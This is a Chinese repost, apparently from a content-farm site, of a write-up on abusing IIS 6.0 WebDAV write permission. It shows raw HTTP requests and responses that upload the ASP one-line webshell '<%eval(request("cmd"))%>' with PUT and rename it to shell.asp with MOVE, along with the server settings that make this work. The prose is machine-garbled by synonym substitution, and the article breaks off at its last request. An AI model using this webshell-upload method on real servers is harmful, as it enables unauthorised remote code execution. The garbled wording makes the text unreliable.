IIS可以PUT,但无法MOVE的缘由[网络技术]
本文“IIS可以PUT,但无法MOVE的缘由[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
本日在测试IIS的put漏洞时,发现可以put全部IIS的不能解析的文件,move也正常,但是却无法move为asp、asa等IIS可以解析的文件,在网上搜索了一段文章后,发现是因为IIS的配置中,没有选上上“脚本资源拜候”所致.普通情形下IIS的配置城市选上这个,但是就让我碰上了,下面这篇文章对这类问题举行了具体的阐明,转过来记录下.
原文地址:小议IIS的特别权限
写了《小议IIS的特别权限》一文之后,在一次实行室内部报告中,我给大家演示了IIS写权限的操纵,但是却没有成功,很烦闷啊.明显我之前都测试过的,怎么会不行了呢?看来必定是IIS配置的问题了.那次演示我用的是新装的Win2003虚拟机,IIS采取的默许的设置,勾选上了主目录标签页下的“写入”复选框.失利的两个地方:
(1)OPTIONS 号令无法查看IIS支持的办法调集.
提 交以下报文:
OPTIONS / HTTP/1.1
Host: www.redicecn.cn
返回以下报文:
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD
Content-Length: 0
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:39:56 GMT
注释:没有返回IIS 支持的办法调集.
(2)PUT asp文件及txt文件均失利.
提交以下报文:
PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26
<%eval(request(“cmd”))%>
返回以下报文:
HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:50:53 GMT
注释:没有成功写入.
提交以下报文:
PUT /test.asp HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26
<%eval(request(“cmd”))%>
返回以下报文:
HTTP/1.1 404 Not Found
Content-Length: 83
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:43:07 GMT
<html><head><title>Error</title>< /head><body>系统找不到指定的文件.
</body></html>
注 释:没有成功写入.
问题的办理:
本日忽然在IIS的“Web服务扩大”列表中看到了“WebDAV”是被禁用 的,会不会是因为“WebDAV”被禁用了的缘由呢?
启用“WebDAV”,哈哈,竟然成功了,公然是“WebDAV”被禁用了的缘由.
再 次提交以下报文(OPTIONS号令):
OPTIONS / HTTP/1.1
Host: www.redicecn.cn
返回以下报文:
HTTP/1.1 200 OK
Date: Fri, 01 Jan 2010 07:54:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
注释:IIS成功返回支持的办法调集.
再 次提交以下报文:
PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26
<%eval(request(“cmd”))%>
返 回以下报文:
HTTP/1.1 201 Created
Date: Fri, 01 Jan 2010 07:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
成功在IIS根目录写入了 test.txt文件.但是直接PUT asp文件还是返回一样的错误信息.小黑们普通采取的办法就是先PUT txt马,然后利用MOVE办法将txt马改名成asp马.
尝试提交以下报文:
MOVE /test.txt HTTP/1.1
Host: www.redicecn.cn
Destination: http://www.redicecn.cn/shell.asp
返 回以下报文:
HTTP/1.1 207 Multi-Status
Date: Fri, 01 Jan 2010 08:02:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/shell.asp
Content-Type: text/xml
Transfer-Encoding: chunked
b8
<?xml version=”1.0″?><a:multistatus xmlns:a=”DAV:”><a:response><a:href>http://www.redicecn.cn/shell.asp</a:href><a:status>HTTP/1.1 403 Forbidden</a:status></a:response></a:multistatus>
0
注 释:失利了,忧郁啊.看来IIS上还有什么机关啊.陷入僵局….
2010年的早晨我翻了一下《黑客浸透笔记》(知识型地痞给我的,他 的朋友冰的原点写的书,送了他两本),在《深化解析IIS写权限》一节中,我发现作者碰到了和我一样的问题,他给出的办理筹划是勾选“脚本资源拜候”复选 框.测试一下:
提交以下报文:
MOVE /test.txt HTTP/1.1
以上是“IIS可以PUT,但无法MOVE的缘由[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |